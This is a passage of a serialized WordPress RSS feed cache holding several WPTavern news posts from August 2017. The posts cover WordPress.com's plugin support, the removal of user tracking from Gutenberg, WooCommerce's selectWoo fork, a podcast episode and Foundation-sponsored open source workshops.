Ecosystem";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=74048";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:122:"https://wptavern.com/wordpress-coms-business-plan-gives-subscribers-a-way-to-tap-into-wordpress-orgs-third-party-ecosystem";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:8395:"<p>Earlier this year, WordPress.com <a href="https://wptavern.com/wordpress-com-experiments-with-allowing-business-plan-customers-to-install-third-party-plugins-and-themes">launched an experiment</a> giving <a href="https://wordpress.com/business/">Business plan subscribers</a> the ability to install third-party plugins and themes. Automattic<a href="https://en.blog.wordpress.com/2017/08/07/wordpress-com-business-now-supports-plugins-and-third-party-themes/"> concluded the experiment</a> earlier this week and officially made the features part of the subscription plan.</p>\n<p>&#8220;With support for plugins and third-party themes, WordPress.com Business users will be able to connect their sites to great email and social media tools, e-commerce solutions, publishing and subscription services, and more,&#8221; Mark Armstrong said.</p>\n<p>This change is twelve years in the making. With the exception of WordPress VIP, customers have not had the ability to install third-party themes and plugins on WordPress.com.</p>\n<h2>Customers Can Only Install Custom Plugins Through The WP-Admin Interface</h2>\n<p>Customers can install plugins or themes from the WordPress.org directories or they can upload custom themes and plugins. WordPress.com has two user interfaces, one that resembles Calypso and the other is WP-Admin.</p>\n<p>Here is what adding plugins looks like using the Calypso interface. Plugins are displayed from the WordPress.org plugin directory with no way to upload a custom plugin.</p>\n<img />Adding Plugins on WordPress.com Through The Calypso Interface\n<p>This is what adding plugins looks like using the WP-Admin interface. This interface has a button that allows customers to upload a custom plugin. Automattic is aware of the discrepancy and says they&#8217;re working on streamlining both interfaces.</p>\n<img />Adding Plugins Through WP-Admin on WordPress.com\n<h2>Customers Can Upload Non 100% GPL Licensed Code to WordPress.com</h2>\n<p>The ability to upload a custom theme or plugin truly opens the door for subscribers to customize their sites. But it also allows customers to use themes and plugins that are not 100% GPL licensed. Matt Mullenweg, CEO of Automattic, has <a href="https://wordpress.org/news/2009/07/themes-are-gpl-too/">made it clear</a> in the past that he will only support plugins and themes that are 100% GPL.</p>\n<blockquote><p>Even though graphics and CSS aren’t <em>required</em> to be GPL legally, the lack thereof is pretty limiting. Can you imagine WordPress without any CSS or JavaScript? So as before, we will only promote and host things on WordPress.org that are 100% GPL <a href="http://en.wikipedia.org/wiki/License_compatibility">or compatible</a>.</p></blockquote>\n<p>Mullenweg has used his <a href="http://designcrumbs.com/automatically-blackballed">influence in the past</a> to provoke marketplaces such as Envato to provide a 100% GPL license option to its authors. Authors who choose not to sell their items with the 100% GPL license are excluded from being able to sponsor or speak at WordCamps.</p>\n<p>Although the above quote references WordPress.org, WordPress.com is a platform that Mullenweg controls. It&#8217;s odd that the ability to upload a theme or plugin that is not 100% GPL exists on WordPress.com. I believe the feature is an oversight and will be removed in the immediate future ensuring that only themes and plugins from the official directories are allowed to be used.</p>\n<h2>Managed WordPress Hosts Have Reasons to Be Concerned</h2>\n<p>Responses to the news from members of the WordPress community are mixed. Phil Crumm, Director of Strategic Opportunities at 10up, <a href="https://medium.com/@philcrumm/the-curious-conundrum-of-the-new-wordpress-com-business-plan-b0044ad57acd">published a great article</a> that examines the potential impacts this move will have on the managed WordPress hosting ecosystem and its community:</p>\n<blockquote>\n<p id="8b34" class="graf graf--p graf-after--h3">Within the WordPress community, there’s long been a notion that &#8216;more users on WordPress&#8217; is universally good. Until now, that’s been difficult to argue: an expansive ecosystem has developed over the last decade, and many now make their living off of WordPress.</p>\n<p id="2813" class="graf graf--p graf-after--p graf--trailing">Despite that, WordPress.com’s Business Plan now feels like it’s oriented towards cannibalizing users from elsewhere within that ecosystem — from sites that may have &#8216;grown up&#8217; and moved to another hosting provider to those that now may not know that the broader ecosystem even exists — which is objectively a step backwards for the WordPress community.</p>\n</blockquote>\n<p><a href="https://perezbox.com/">Tony Perez</a>, co-founder and CEO of Sucuri, says the <a href="https://perezbox.com/2017/08/automattics-push-managed-wordpress-potential-impacts-hosting-ecosystem/">implications are gravest</a> to managed WordPress hosts. &#8220;The biggest impacts however are likely to be towards those hosting companies that have invested resources (both people and dollars) into creating a vibrant Managed WordPress hosting business ecosystem,&#8221; Perez said.</p>\n<p>&#8220;Long are the days when the market was defined by Page.ly and WPEngine. Today I would consider the space to be saturated, with more flavors of Managed WordPress than ice cream at a Baskin-Robbins.&#8221;</p>\n<p><a href="http://chrislema.com/">Chris Lema</a>, a member of Liquid Web&#8217;s Leadership team, <a href="https://perezbox.com/2017/08/automattics-push-managed-wordpress-potential-impacts-hosting-ecosystem/#comment-3456606874">responded to the article</a> saying it&#8217;s rare for manufactures to enter the same market as their distributors or partners.</p>\n<p>&#8220;While not impossible, we rarely see manufacturers get into the same business as their distributors or retail partners,&#8221; Lema said.</p>\n<p>&#8220;That&#8217;s because it can create a lot of unwanted, unplanned for, unintended secondary consequences. But to inexpensive hosts, this is one of those head-turners, because they were assured, for oh so long, that this wasn&#8217;t the game Automattic was getting into.</p>\n<p>&#8220;But Automattic is not just a nice community player. They&#8217;re a business. With investors. And they have to think about their own bottom line. So while it&#8217;s not surprising, I think you&#8217;re right that hosts have the most to be thinking about.&#8221;</p>\n<p>Others like Scott Bolinger, have expressed cautious optimism regarding the change.</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">3rd party plugins and themes can now be used on <a href="https://t.co/eNa4NCrrPO">https://t.co/eNa4NCrrPO</a>. This is great news, although how great remains to be seen. <a href="https://t.co/TntfJJ9sLD">https://t.co/TntfJJ9sLD</a></p>\n<p>&mdash; Scott Bolinger (@scottbolinger) <a href="https://twitter.com/scottbolinger/status/894627296648114176">August 7, 2017</a></p></blockquote>\n<p></p>\n<p>Some theme and plugin authors see it as a growth opportunity. Josh Pollock, founder of <a href="https://calderaforms.com/">CalderaWP,</a> is excited to see WordPress.com become a quality hosting option for his users.</p>\n<p>&#8220;As a plugin author, I like not just more places for my plug-in to be used, but more quality hosting options,&#8221; Pollock said. &#8220;Dealing with sub-optimal environments is the hardest part of being a plug-in author. I&#8217;m excited about more users and having those users be on a quality platform.&#8221;</p>\n<h2>How Much Pie Does Automattic Want?</h2>\n<p>WordPress.com offering a subset of customers the ability to access the incredible third-party WordPress plugin and theme ecosystem is a huge development, but it leaves me with a few questions. First, why is WordPress.com only now offering this feature? Why wasn&#8217;t it available years ago?</p>\n<p>WordPress.com is now competing head-to-head with managed hosts. As <a href="https://ma.tt/2016/12/wp-growth-council/">initiatives are established</a> to grow the WordPress pie for all, how much of that pie does Automattic want for itself? Considering Automattic is a business backed by investors, does it matter how much they want or get?</p>\n<p>How do you feel about WordPress.com allowing subscribers to tap into the WordPress.org ecosystem?</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 11 Aug 2017 07:12:49 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:21;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:78:"WPTavern: User Tracking to be Removed from Gutenberg in Upcoming 0.8.0 Release";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=74044";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:89:"https://wptavern.com/user-tracking-to-be-removed-from-gutenberg-in-upcoming-0-8-0-release";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:9564:"<a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2017/08/asystole.jpg?ssl=1"><img /></a>photo credit: <a href="http://www.savingchicagocpr.com/termination-resuscitation-efforts/">Saving Chicago CPR</a>\n<p>The opt-in user tracking that was <a href="https://wptavern.com/gutenberg-0-7-0-adds-opt-in-usage-tracking" target="_blank">added to Gutenberg 0.7.0</a> will be pulled from the plugin in the upcoming 0.8.0 release. The data collection included in last week&#8217;s release reignited the <a href="https://core.trac.wordpress.org/ticket/38418" target="_blank">discussion regarding adding telemetry to WordPress</a>.</p>\n<p>James Nylen and an Automattic engineers involved in Gutenberg added the feature with the goal of improving the editor based on usage patterns. Nylen said the approach they used was very similar to Calypso&#8217;s event tracking code and that it would provide &#8220;a very useful technique to collect user experience data.&#8221; They had planned to use the data to inform various decisions, such as default order for blocks and whether some blocks are less suitable for core. Gutenberg contributors were looking into making the tracking its own module so it could be useful for other WP feature plugins and core.</p>\n<p>Shortly after the feature was added to Gutenberg, contributors began to revisit the Telemetry discussion on WordPress Trac. The topic of telemetry for core had been tabled earlier this year, as it did not fall within the three core focus areas for WordPress development in 2017. Participants requested the ticket be reopened for discussion looking toward 2018 in light of Gutenberg adding opt-in tracking.</p>\n<p>&#8220;I think it&#8217;s a terrible idea for Gutenberg, too,&#8221; Matt Mullenweg commented on the ticket. &#8220;I doubt that anything actionable or useful will come of it that couldn&#8217;t be obtained by non-data-collecting means.&#8221;</p>\n<p>Twelve hours later, James Nylen <a href="https://make.wordpress.org/core/2017/08/06/opt-in-usage-tracking-in-gutenberg/#comment-32882" target="_blank">commented</a> on his original announcement to notify the community that tracking will be removed from Gutenberg in the 0.8.0 release:</p>\n<blockquote><p>There’s been quite a lot of discussion on this topic across the community, much of which stems from earlier discussions like <a href="https://core.trac.wordpress.org/ticket/38418" target="_blank">#38418</a>, which I wasn’t aware of.</p>\n<p>Usage tracking in Core and feature projects is a much bigger topic than fits into the scope of Gutenberg right now, so I’ve removed it from the GitHub repo, and it will be removed in the 0.8 Gutenberg release.</p>\n<p>The data that it was tracking, while interesting, probably wouldn’t have been a significant factor in the long-term growth and development of Gutenberg. The discussion surrounding the data collection, however, would take up a disproportionate amount of the team’s time.</p></blockquote>\n<p>Nylen said the data collected by the plugin thus far will be deleted after 0.8 rolls out and that since it&#8217;s so early in Gutenberg&#8217;s development there was &#8220;not enough data collected to provide any sort of picture of usage.&#8221;</p>\n<h3>WordPress Telemetry Advocates Continue Lobbying for Opt-In Data Collection</h3>\n<p>The discussion about whether or not WordPress needs telemetry has continued in the form of tweetstorms, as data collection advocates make the case for data-driven decision making.</p>\n<p>&#8220;The decision not to capture metrics (telemetry) from WordPress is one that continues to have a large impact on what we (don&#8217;t) know,&#8221; Liquid Web VP of Product Chris Lema <a href="https://twitter.com/chrislema/status/895136427977068544" target="_blank">said</a>. &#8220;As we&#8217;re trying to make decisions about Gutenberg and metaboxes, we might ask, how big a problem is this, by number of plugins or sites. But we don&#8217;t know because we decided that we can always iterate WordPress, like we&#8217;ve always done. It&#8217;s true that we&#8217;ve done that before, but that doesn&#8217;t mean it&#8217;s either the wisest approach, nor the least risky. With so many options today, will people necessarily return? The more logical approach, in my mind, is to capture as much data as possible and to make it as public as possible, so we can all review.&#8221;</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">If the problem were lack of data, we could easily produce terabytes per day.</p>\n<p>&mdash; Matt Mullenweg (@photomatt) <a href="https://twitter.com/photomatt/status/895506034533453825">August 10, 2017</a></p></blockquote>\n<p></p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">seconded with the power of 1000 suns</p>\n<p>&mdash; joe guilmette <img src="https://s.w.org/images/core/emoji/2.3/72x72/1f1f9-1f1ed.png" alt="🇹🇭" class="wp-smiley" /> (@travlbum) <a href="https://twitter.com/travlbum/status/895539950933782528">August 10, 2017</a></p></blockquote>\n<p></p>\n<p><a href="https://mor10.com/the-case-for-wordpress-telemetry/" target="_blank">WordPress Telemetry proposal</a> author Morten Rand-Hendriksen joined in the discussion with another <a href="https://twitter.com/mor10/status/895299336375902209" target="_blank">tweetstorm</a>:</p>\n<blockquote><p>WordPress needs a core method for collecting quantitative user data through telemetry (metrics). One of the biggest challenges WordPress faces is the lack of reliable data about global day-to-day use. Like most Open Source projects, WordPress has relied on community feedback as its primary data source, which is fine for a small project. The problem is WordPress is a Very Big Project with global reach and the majority of its users never interface with the community. </p>\n<p>I like to say we, the people who talk about, provide feedback for, and design/develop WordPress are the 1%. It might be more like 0.1%. Making decisions based on the traditional community feedback model is making decisions without knowing anything about the majority of users. Some will argue this is fine, that WordPress is developed by those who show up. That&#8217;s not a workable or responsible model for a project. We, the people who build WordPress, have a duty of care to the people we build it for. And those people are not us. &#8216;We can just do user testing,&#8217; you say? Sure. Let&#8217;s do proper qualitative user testing. That requires staffing, funding, and infrastructure. User testing for a project like WordPress is non-trivial. It requires professional analysis.</p></blockquote>\n<p>Rand-Hendriksen&#8217;s tweetstorm continued with a summary of his telemetry proposal which would be opt-in based on a plugin prompted from core. The plugin would anonymize all collected data and allow for targeted data collection based on research needs. He proposes that the data be stored on servers owned by the community, separate from corporate interests, so the data can be shared openly to ensure transparency. The <a href="https://core.trac.wordpress.org/ticket/38418" target="_blank">ticket</a> for this feature request is currently closed.</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">This discussion belongs in Trac in an open ticket. Closing it down because one person disagrees is not the Open Source way.</p>\n<p>&mdash; MortenRandHendriksen (@mor10) <a href="https://twitter.com/mor10/status/895307240122368001">August 9, 2017</a></p></blockquote>\n<p></p>\n<p>&#8220;There’s a ton going on, and it’s far more important than built-in big brother centralized tracking,&#8221; Mullenweg <a href="https://twitter.com/photomatt/status/895678580935491588" target="_blank">said</a> in response to Rand-Hendriksen&#8217;s tweetstorm. &#8220;Do it as a plugin or with a host and show it informs a decision that we wouldn’t have taken otherwise. And remember that past usage is not a good predictor of future success, or what the world needs. We need to build iPhones not Blackberries.&#8221;</p>\n<p>During the <a href="https://wptavern.com/state-of-the-word-2016-mullenweg-pushes-calypso-as-future-of-wordpress-interface-proposes-major-changes-to-release-cycle" target="_blank">2016 State of the Word</a> address, Mullenweg proposed a new structure for core releases in 2017 where he would be putting on the &#8216;product lead&#8217; hat and have design and user testing lead the way. As feature requests have popped up outside of the three core focus areas, Mullenweg has had to systematically shut them down or put them on hold for later in order to keep Gutenberg on track.</p>\n<p>However, it&#8217;s not surprising that the engineers leading the Gutenberg project, most of whom are employed by Automattic, wouldn&#8217;t think twice about adding user tracking. The company has <a href="https://data.blog/" target="_blank">a blog entirely devoted to data</a> where its data scientists write about the data pipelines they have built to help the company create a sustainable business. Historically, Automattic has strongly embraced using data in making decisions, which is why Calypso has event tracking built into it. Mullenweg is taking a different product leadership approach with the open source WordPress project.</p>\n<p>&#8220;For people unhappy with our direction, no amount of data will change their minds,&#8221; Mullenweg said in response to critics on Twitter. &#8220;The results will tell. I’m happy to stand by them the past 14 years, and believe the next 14 will validate our approach.&#8221;</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 11 Aug 2017 02:08:49 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:22;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:108:"WPTavern: WooCommerce Forks select2, Releases selectWoo as a Drop-In Replacement with Improved Accessibility";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=73999";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:118:"https://wptavern.com/woocommerce-forks-select2-releases-selectwoo-as-a-drop-in-replacement-with-improved-accessibility";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:4160:"<p>The WooCommerce development team has <a href="https://woocommerce.wordpress.com/2017/08/08/selectwoo-an-accessible-replacement-for-select2/" target="_blank">forked select2</a> to create a more accessible, drop-in replacement library called selectWoo. <a href="https://select2.github.io/" target="_blank">select2</a> is a widely used jQuery-based library for making custom drop down menus. Many users are wondering if the project has been abandoned, because the repository hasn&#8217;t seen any activity since February and 115 pull requests have piled up.</p>\n<p>In the interest of fixing some long-standing accessibility issues with the library, WooCommerce opted to fork it and has merged in some of the PRs that were submitted to the original project. SelectWoo is backwards-compatible and can be used the same way as select2 by simply replacing the select2.js file. It has been optimized for WordPress plugin development and can optionally be initialized with .selectWoo() in order to run alongside other versions of select2 that may be used by other plugins on the site.</p>\n<p>SelectWoo makes many improvements for those who are using screen readers, but it needs more accessibility testing. <a href="https://github.com/woocommerce/selectWoo/releases/tag/woo-1.0.0-beta.1" target="_blank">Beta 1</a> is availabe on GitHub. The WooCommerce team has even created a <a href="https://woocommerce.github.io/selectWoo/accessibility-testing/" target="_blank">testing page</a> with different example pages so those using screen-reading software can easily test for bugs.</p>\n<p>Forking is usually a last resort scenario for extending popular open source libraries, but the WooCommerce team wanted the flexibility of improving the project on their own timeline. One concerned developer asked the team what will happen in the future if select2 gets back on track and why they didn&#8217;t just submit pull requests to the select2 repository.</p>\n<p>&#8220;With a fork we can at least get things merged in to meet our own schedule, rather than waiting/relying on others or running custom versions,&#8221; WooCommerce lead developer Mike Jolley said. &#8220;There are other benefits, too, such as allowing our version to be namespaced to avoid conflicts in WP admin. The fork is public. Our changes can be merged back, when/if the project picks up again.&#8221;</p>\n<p>Both WordPress and Drupal core contributors have been working to <a href="https://github.com/select2/select2/issues/3744" target="_blank">address accessibility issues in select2</a> since 2015 when the WP Accessibility Team <a href="https://make.wordpress.org/accessibility/2015/09/07/accessibility-usertest-select2/" target="_blank">performed extensive testing on the library</a> to see if it was fit for use in core. Some initial planning work happened but work on these issues stalled out as select2&#8217;s maintainers became unavailable.</p>\n<p>&#8220;I&#8217;d do it with PRs if I thought they would get merged in, but I doubt they will,&#8221; WooCommerce developer Claudiu Lodromanean <a href="https://github.com/select2/select2/issues/3744#issuecomment-320464534" target="_blank">said</a>. &#8220;There&#8217;s been no action in this repo in about six months and the fork contains some PRs that have been waiting to get merged here for a very long time.&#8221;</p>\n<p>Forking a project can needlessly fragment its contributors by causing them to have to choose one or the other, especially as the projects diverge down the line. Motivated contributors may submit multiple PRs across both projects for improvements but most will simply contribute back to the project they use. Select2&#8217;s maintainers have not published any news about why the project has gone dormant.</p>\n<p>&#8220;There are <a href="https://github.com/select2/select2/pulls" target="_blank">over 100 PRs in the select2 repo</a> unmerged,&#8221; Jolley said in response to commenters asking about the necessity of the fork. &#8220;Some of these we actually need, so with the fork we’re free to merge these as needed. The accessibility issues are hurting users today, so we cannot really afford to wait.&#8221;</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 10 Aug 2017 03:54:27 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:23;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:65:"WPTavern: WPWeekly Episode 284 – Catching Up with David Peralty";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:58:"https://wptavern.com?p=74024&preview=true&preview_id=74024";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:72:"https://wptavern.com/wpweekly-episode-284-catching-up-with-david-peralty";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2867:"<p>In this episode, <a href="https://jjj.blog/">John James Jacoby</a> and I are joined by <a href="https://peralty.com/">David Peralty</a>. Peralty is a prolific writer with more than 30K articles published online for various media outlets. He also co-hosted WordPress Weekly episodes 41-75 in 2009.</p>\n<p>We discuss the rise and evolution of blog networks over the years, the current state of WordPress development, and what he thinks of Gutenberg.</p>\n<p>We have a great conversation about working remotely and how working in an office with great people focused on the same goal can be an energizing experience. Later in the show, Jacoby and I discuss the news of the week, including the idea of opt-in usage data tracking in WordPress.</p>\n<h2>Stories Discussed:</h2>\n<p><a href="https://wptavern.com/publishers-are-moving-back-to-wordpress-after-short-experiments-with-medium">Publishers Are Moving Back to WordPress After Short Experiments with Medium</a><br />\n<a href="https://wptavern.com/trademark-trial-and-appeal-board-dismisses-automattics-trademark-dispute-against-chris-pearson">Trademark Trial and Appeal Board Dismisses Automattic’s Trademark Dispute Against Chris Pearson</a><br />\n<a href="https://wptavern.com/gutenberg-0-7-0-adds-opt-in-usage-tracking">Gutenberg 0.7.0 Adds Opt-In Usage Tracking</a><br />\n<a href="https://wptavern.com/gutenberg-development-team-confirms-meta-box-api-will-not-be-formally-deprecated">Gutenberg Development Team Confirms Meta Box API Will Not be Formally Deprecated</a><br />\n<a href="https://wptavern.com/wordpress-core-fields-api-project-sees-renewed-interest">WordPress Core Fields API Project Sees Renewed Interest</a></p>\n<h2>Picks of the Week:</h2>\n<p>Comment moderation is not the same as censorship, or is it?</p>\n<blockquote class="wp-embedded-content"><p><a href="https://halfelf.org/2013/censorship-in-moderation/">Censorship in Moderation</a></p></blockquote>\n<p></p>\n<p><a href="https://github.com/rmccue/not-trac">Not Trac</a> by Ryan McCue, connects to WordPress.org&#8217;s Trac instance via XML-RPC. Before using, please read McCue&#8217;s warnings about usernames and passwords.</p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, August 16th 3:00 P.M. Eastern</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href="https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738" target="_blank" rel="noopener">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href="https://wptavern.com/feed/podcast" target="_blank" rel="noopener">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href="http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr" target="_blank" rel="noopener">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #284:</strong><br />\n</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 10 Aug 2017 00:43:12 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:24;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:72:"WPTavern: WordPress Foundation to Sponsor Open Source Educational Events";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=73970";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:83:"https://wptavern.com/wordpress-foundation-to-sponsor-open-source-educational-events";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:3313:"<a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2015/06/open-source.jpg?ssl=1"><img /></a>photo credit: <a href="http://www.flickr.com/photos/79777096@N00/6866996865">16th st</a> &#8211; <a href="https://creativecommons.org/licenses/by-nd/2.0/">(license)</a>\n<p>The WordPress Foundation is <a href="http://wordpressfoundation.org/2017/call-for-organizers-introduction-to-open-source/" target="_blank">sponsoring a new series of workshops and training events</a> that will introduce people to WordPress and related open source software. The program targets communities in Latin and South America, Africa, Oceania, and Asia.</p>\n<p>&#8220;Specifically, we want to shine more light on the potential of open source software in countries where there is less participation in OSS projects,&#8221; WordPress Community Team leader Andrea Middleton said. &#8220;To help spread the word about the potential that open source has to offer, we’d like to provide financial support for two educational events this year, to be organized in parts of the world with less participation in open source.&#8221;</p>\n<p>After the success of the <a href="https://wptavern.com/wordcamp-incubator-program-to-launch-in-indonesia-zimbabwe-and-columbia" target="_blank">WordCamp Incubator Program</a>, which brought three new camps to Indonesia, Zimbabwe, and Colombia, there is some evidence that initiatives to bring WordPress to other parts of the world can have valuable returns. <a href="https://wptavern.com/harare-zimbabwe-to-host-its-2nd-wordcamp-november-4-2017" target="_blank">Harare is hosting its second WordCamp</a> in November and the local meetup group has nearly doubled over the past year. The other camps had similarly successful events and growth in meetup numbers.</p>\n<p>WordCamp Harare organizer Thabo Tswana said that one of the biggest impacts that the first WordCamp had was to introduce local attendees to the WordPress community. WordPress software is well-known across the world but many do not know that there is a strong community behind the project that they can connect with.</p>\n<p>The WordPress Foundation is looking for organizers to host &#8220;Introduction to Open Source&#8221; events that will be structured as two-hour workshops using <a href="https://make.wordpress.org/training/handbook/user-lessons/what-is-open-source/" target="_blank">training</a> <a href="https://make.wordpress.org/training/handbook/user-lessons/what-can-you-do-with-wordpress/" target="_blank">materials</a> available in the WordPress handbook. The goal is to introduce attendees to the world of open source software, the GPL license, and how it is important for WordPress as an open source project.</p>\n<p>The Foundation is subsidizing the events (up to $500) so they will be free for anyone to attend. A <a href="http://wordcampcentral.polldaddy.com/s/open-source-training-organizer-application" target="_blank">10-question application</a> is open for those who want to organize an event in 2017. The call for organizers says that preference will be given to organizers who are already members of a group that is part of WordPress&#8217; meetup chapter program and areas where no WordCamp has previously been organized. Applications close August 21 and successful applicants will be notified by September 8.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 09 Aug 2017 19:19:48 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:25;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	